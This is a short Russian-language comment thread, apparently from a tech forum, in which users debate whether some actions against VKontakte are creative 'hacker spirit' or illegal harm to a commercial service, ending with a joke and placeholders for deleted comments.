Компьютеры и интернет уже стали совершенно обыденной частью жизни. На этом этапе важнее уже не «хакерский дух» и «живость», а стабильность и игра по правилам.
К тому же — в чем выражается «живость» ВК, кроме таких достойных первобытного общества действий?
«Хакерский дух», на мой взгляд — это, например, посмотреть на существующие системы контроля версий, сказать «они все отстой» — и сделать свою. И множество аналогичных примеров. В общем, созидание, а не разрушение.
А тут — незаконные действия, приводящие к потере прибыли коммерческим сервисом. Фу.
0
Незаконными эти действия может назвать только суд. Лично я для этого оснований не вижу.
0
А тут незаконные действия от имени пользователей, результат которых благотворно влияет на качество контента для тех же пользователей.
0
Ладно фиг с ним с шефом, как я жене объясню зачем у меня ххх открывался :)
UFO landed and left these words here
UFO landed and left these words here